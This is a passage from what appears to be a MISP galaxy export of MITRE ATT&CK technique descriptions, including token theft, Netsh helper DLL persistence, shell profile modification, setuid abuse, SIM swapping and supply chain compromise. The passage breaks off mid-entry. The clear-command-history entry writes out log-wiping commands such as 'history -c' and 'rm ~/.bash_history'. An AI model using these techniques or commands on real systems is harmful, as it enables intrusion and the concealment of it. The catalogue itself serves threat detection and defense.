This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1241).

An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine strategic target - T1241"

Table 5850. Table References

Links

https://attack.mitre.org/techniques/T1241

Browser Information Discovery - T1217

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).(Citation: Chrome Roaming Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217"

Table 5851. Table References

Links

https://attack.mitre.org/techniques/T1217

https://support.google.com/chrome/a/answer/7349337

https://www.kaspersky.com/blog/browser-data-theft/27871/

Netsh Helper DLL - T1128

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)

Proof of concept code exists to load Cobalt Strike’s payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128"

Table 5852. Table References

Links

https://attack.mitre.org/techniques/T1128

https://github.com/outflankbv/NetshHelperBeacon

https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

https://technet.microsoft.com/library/bb490939.aspx

Remote Access Software - T1219

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as VNC, TeamViewer, AnyDesk, ScreenConnect, LogMeIn, Ammyy Admin, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Installation of many remote access software packages may also include persistence (e.g., the software’s installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219"

Table 5853. Table References

Links

https://attack.mitre.org/techniques/T1219

https://blog.crysys.hu/2013/03/teamspy/

https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf

External Remote Services - T1133

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)

The tag is: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133"

Table 5854. Table References

Links

https://attack.mitre.org/techniques/T1133

https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html

https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

Obfuscation or cryptography - T1313

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1313).

Obfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscation or cryptography - T1313"

Table 5855. Table References

Links

https://attack.mitre.org/techniques/T1313

Access Token Manipulation - T1134

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These tokens can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)

Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

The tag is: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134"

Table 5856. Table References

Links

https://attack.mitre.org/techniques/T1134

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx

https://pentestlab.blog/2017/04/03/token-manipulation/

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf

Account Access Removal - T1531

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)

In Windows, the [Net](https://attack.mitre.org/software/S0039) utility and the <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.

The tag is: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531"

Table 5857. Table References

Links

https://attack.mitre.org/techniques/T1531

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

Network Share Discovery - T1135

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for SMB services.

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"

Table 5858. Table References

Links

https://attack.mitre.org/techniques/T1135

https://en.wikipedia.org/wiki/Shared_resource

https://technet.microsoft.com/library/cc770880.aspx

Office Application Startup - T1137

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137"

Table 5859. Table References

Links

https://attack.mitre.org/techniques/T1137

https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://github.com/sensepost/ruler

https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746

https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

Dynamic Data Exchange - T1173

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173"

Table 5860. Table References

Links

https://attack.mitre.org/techniques/T1173

https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

https://technet.microsoft.com/library/security/4053440

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

https://www.contextis.com/blog/comma-separated-vulnerabilities

Obfuscate operational infrastructure - T1318

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate operational infrastructure - T1318"

Table 5861. Table References

Links

https://attack.mitre.org/techniques/T1318

SIM Card Swap - T1451

An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)

One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)

The tag is: misp-galaxy:mitre-attack-pattern="SIM Card Swap - T1451"

Table 5862. Table References

Links

http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/

http://www.dos.ny.gov/consumerprotection/scams/att-sim.html

https://attack.mitre.org/techniques/T1451

https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/

https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam

https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html

https://techcrunch.com/2017/08/23/i-was-hacked/

https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters

URL Scheme Hijacking - T1415

An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).

The tag is: misp-galaxy:mitre-attack-pattern="URL Scheme Hijacking - T1415"

Table 5863. Table References

Links

http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html

https://attack.mitre.org/techniques/T1415

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html

https://tools.ietf.org/html/rfc7636

https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html

https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures

Clear Command History - T1146

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they’ve done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions. Since everything typed on the command line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appearing in these logs, such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, and <code>rm ~/.bash_history</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146"

Table 5864. Table References

Links

https://attack.mitre.org/techniques/T1146

System Location Discovery - T1614

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance’s availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)

The tag is: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614"

Table 5865. Table References

Links

https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf

https://attack.mitre.org/techniques/T1614

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows

https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/

https://securelist.com/transparent-tribe-part-1/98127/

https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

Password Filter DLL - T1174

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.

Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174"

Table 5866. Table References

Links

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

https://attack.mitre.org/techniques/T1174

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Device Type Discovery - T1419

On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.

The tag is: misp-galaxy:mitre-attack-pattern="Device Type Discovery - T1419"

Table 5867. Table References

Links

https://attack.mitre.org/techniques/T1419

https://developer.android.com/reference/android/os/Build

Spearphishing via Service - T1194

Spearphishing via service is a specific variant of spearphishing. It differs from other forms of spearphishing in that it delivers messages through third-party services rather than directly through enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194"

Table 5868. Table References

Links

https://attack.mitre.org/techniques/T1194

https://capec.mitre.org/data/definitions/163.html

Cloud Administration Command - T1651

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Administration Command - T1651"

Table 5869. Table References

Links

https://attack.mitre.org/techniques/T1651

https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html

https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview

https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

Group Policy Discovery - T1615

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path <code>\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615"

Table 5870. Table References

Links

https://adsecurity.org/?p=2716

https://attack.mitre.org/techniques/T1615

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult

https://github.com/PowerShellEmpire/Empire

Malicious Shell Modification - T1156

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as via SSH), a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use <code>/etc/profile</code> when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> (Rocke), which are sourced when a user opens a command line interface or connects remotely. Adversaries often use <code>~/.bash_profile</code> since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the <code>~/.bashrc</code> file (Tsunami, Rocke, Linux Rabbit, Magento), which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon); adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session (Pearl_shellbot).

For macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>. The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156"

Table 5871. Table References

Links

https://attack.mitre.org/techniques/T1156

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Browser Session Hijacking - T1185

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary’s browser through the user’s browser by setting up a proxy which will redirect web traffic. This does not alter the user’s traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened, and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and for which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185"

Table 5872. Table References

Links

https://attack.mitre.org/techniques/T1185

https://en.wikipedia.org/wiki/Man-in-the-browser

https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf

https://www.cobaltstrike.com/help-browser-pivoting

https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses

Supply Chain Compromise - T1195

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

  • Manipulation of development tools

  • Manipulation of a development environment

  • Manipulation of source code repositories (public or private)

  • Manipulation of source code in open-source dependencies

  • Manipulation of software update/distribution mechanisms

  • Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware)

  • Replacement of legitimate software with modified versions

  • Sales of modified/counterfeit products to legitimate distributors

  • Shipment interdiction

While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195"

Table 5873. Table References

Links

https://attack.mitre.org/techniques/T1195

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028--OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206--E

https://www.commandfive.com/papers/C5_APT_SKHack.pdf

https://www.se.com/ww/en/download/document/SESN-2018-236-01/

https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Setuid and Setgid - T1166

When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits either via bitmasking, <code>chmod 4777 [file]</code>, or via shorthand naming, <code>chmod u+s [file]</code>.

An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).

The tag is: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166"

Table 5874. Table References

Links

http://man7.org/linux/man-pages/man2/setuid.2.html

https://attack.mitre.org/techniques/T1166

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Local Job Scheduling - T1168

On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction with an established remote session, like secure shell (SSH).

cron

System-wide cron jobs are installed by modifying the <code>/etc/crontab</code> file, the <code>/etc/cron.d/</code> directory, or other locations supported by the cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.

